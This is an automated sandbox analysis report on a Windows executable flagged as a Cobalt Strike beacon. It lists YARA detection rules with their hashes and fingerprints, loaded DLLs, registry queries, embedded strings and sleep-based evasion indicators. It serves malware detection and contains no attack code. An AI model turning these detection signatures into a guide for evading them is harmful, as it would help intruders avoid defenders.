Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: Process Memory Space: Z9fvmHepQC.exe PID: 1720, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23

Source: classification engine

Classification label: mal96.troj.winEXE@1/0@1/1

Source: Z9fvmHepQC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Z9fvmHepQC.exe	String found in binary or memory: assertion failed: pos != u32::MAX/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-environ-17.0.3/src/address_map.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: /user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cranelift-17.0.3/src/debug/transform/address_transform.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: or re-adding support for interface types you can see this issue: https://github.com/bytecodealliance/wasmtime/issues/677 unimplemented section in wasm file
Source: Z9fvmHepQC.exe	String found in binary or memory: /user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/addr2line-0.21.0/src/lib.rsNon UTF-8 ELF section nameInvalid ELF program header size or alignmentInvalid ELF program header entry sizeInvalid ELF section header offset/size/alignmentInvalid ELF se
Source: Z9fvmHepQC.exe	String found in binary or memory: /user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/addr2line-0.21.0/src/function.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: $/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/addr2line-0.21.0/src/function.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: /user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cranelift-17.0.3/src/debug/transform/address_transform.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: and for re-adding support for interface types you can see this issue:
Source: Z9fvmHepQC.exe	String found in binary or memory: assertion failed: pos != u32::MAX/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-environ-17.0.3/src/address_map.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: ^;#assertion failed: pos != u32::MAX/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-environ-17.0.3/src/address_map.rs
Source: Z9fvmHepQC.exe	String found in binary or memory: /user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/addr2line-0.21.0/src/lib.rsNon UTF-8 ELF section nameInvalid ELF program header size or alignmentInvalid ELF program header entry sizeInvalid ELF section header offset/size/alignmentInvalid ELF section header entry sizeInvalid ELF e_shstrndxInvalid ELF shstrtab sizeInvalid ELF header size or alignmentUnsupported ELF headerMissing ELF section headers for e_phnum overflowMissing ELF section headers for e_shstrndx overflowMissing ELF e_shstrndxInvalid ELF section header offset or sizeInvalid ELF symbol name offsetInvalid ELF section size or offsetInvalid ELF section name offsetInvalid ELF string section offset or sizeInvalid ELF section indexInvalid COFF/PE section headersInvalid COFF section offset or sizeInvalid XCOFF auxiliary header sizeInvalid XCOFF header size or alignmentUnsupported XCOFF header/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/object-0.32.2/src/read/xcoff/symbol.rsInvalid XCOFF symbol name offsetb
Source: Z9fvmHepQC.exe	String found in binary or memory: //user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/addr2line-0.21.0/src/lib.rsNon UTF-8 ELF section nameInvalid ELF program header size or alignmentInvalid ELF program header entry sizeInvalid ELF section header offset/size/alignmentInvalid ELF section header entry sizeInvalid ELF e_shstrndxInvalid ELF shstrtab sizeInvalid ELF header size or alignmentUnsupported ELF headerMissing ELF section headers for e_phnum overflowMissing ELF section headers for e_shstrndx overflowMissing ELF e_shstrndxInvalid ELF section header offset or sizeInvalid ELF symbol name offsetInvalid ELF section size or offsetInvalid ELF section name offsetInvalid ELF string section offset or sizeInvalid ELF section indexInvalid COFF/PE section headersInvalid COFF section offset or sizeInvalid XCOFF auxiliary header sizeInvalid XCOFF header size or alignmentUnsupported XCOFF header/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/object-0.32.2/src/read/xcoff/symbol.rsInvalid XCOFF symbol name offsetb

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Z9fvmHepQC.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Z9fvmHepQC.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Z9fvmHepQC.exe

Static file information: File size 5258240 > 1048576

Source: Z9fvmHepQC.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x335400
Source: Z9fvmHepQC.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x185400

Source: Z9fvmHepQC.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: Z9fvmHepQC.exe	Static PE information: section name: .eh_fram
Source: Z9fvmHepQC.exe	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00000215D771375C push 0000006Ah; retf		0_2_00000215D7713774
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFD73DA push rcx; iretd		0_2_00007FF66DFD73DB

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

API coverage: 6.6 %

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe TID: 3936

Thread sleep time: -75000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

Code function: 0_2_00007FF66E205718 GetSystemInfo,

0_2_00007FF66E205718

Source: Z9fvmHepQC.exe, 00000000.00000002.3254800570.00000215D78D8000.00000004.00000020.00020000.00000000.sdmp, Z9fvmHepQC.exe, 00000000.00000002.3254282764.00000215D77B2000.00000004.00000020.00020000.00000000.sdmp, Z9fvmHepQC.exe, 00000000.00000002.3254282764.00000215D7779000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66DFA1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,		0_2_00007FF66DFA1180
Source: C:\Users\user\Desktop\Z9fvmHepQC.exe	Code function: 0_2_00007FF66E492748 SetUnhandledExceptionFilter,SwitchToThread,Sleep,		0_2_00007FF66E492748

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Z9fvmHepQC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z9fvmHepQC.exe.21658210000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Z9fvmHepQC.exe.215d7691000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009609332.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2012673442.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2034996552.00000215D7E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3255937250.00000217D9E50000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2013941314.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2035560435.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Z9fvmHepQC.exe PID: 1720, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009341237.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009592329.00000215D7805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009574337.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008825010.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2009488257.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
